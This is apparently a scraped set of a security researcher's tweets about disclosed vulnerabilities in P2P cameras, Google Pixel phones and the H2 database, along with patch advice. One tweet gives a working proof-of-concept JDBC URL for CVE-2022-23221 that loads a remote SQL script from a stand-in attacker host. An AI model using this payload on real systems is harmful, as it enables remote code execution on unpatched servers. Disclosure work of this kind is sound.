My @defcon talk "Abusing P2P to Hack 3 Million Cameras" is now live! Come see just how easy it is for anyone in the world to hijack your camera from the comfort of their own home.
There will be a live Q&A session on August 8 @ 14:30 PST. #DEFCONSafeMode
https://t.co/hUoYoLAk0m
I found a vulnerability that allowed me to unlock any @Google Pixel phone without knowing the passcode. This may be my most impactful bug so far.
Google fixed the issue in the November 5, 2022 security patch. Update your devices!
https://t.co/LUwSvEMF3w
https://t.co/MzGmZGRsiz has been updated with the latest statistics, prefixes & geolocation map!
Rapidly approaching *9 million* cameras discovered since the start of this project. 👀
I updated the P2P Wireshark dissector to handle a few new message types. These have been seen in the wild on Anker/Eufy devices.
Update here! https://t.co/rz7DYfG5NI
Another unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221. Fixed in v2.1.210+. PoC: jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://attacker/evil.sql';'\
In light of yesterday’s ICS-CERT disclosure on security camera vulnerabilities, read the blog on similar vulnerabilities in Reolink #IoT security cameras. https://t.co/R2iuT5mRLK
Earlier today, we disclosed a remotely exploitable vulnerability affecting ThroughTek’s P2P SDK. The vulnerability has a CVSS v3 base score of 9.1 and could affect several million connected devices.
https://t.co/VdSFS1d4ZQ via @threatpost
@statsguyuk @defcon Hi! Firmware after June 2020 no longer has the RCE/cryptographic issues, however man-in-the-middle attacks are still trivial due to the use of P2P. I strongly recommend turning off the P2P option via the web interface.
My @defcon talk "Abusing P2P to Hack 3 Million Cameras" is now live! Come see just how easy it is for anyone in the world to hijack your camera from the comfort of their own home.
There will be a live Q&A session on August 8 @ 14:30 PST. #DEFCONSafeMode
https://t.co/hUoYoLAk0m
I've been informed that someone is hacking into cameras and leaving a link to my site. This is *NOT* me doing this.
I can understand wanting to inform people, but this is invasive and I do not condone this sort of thing.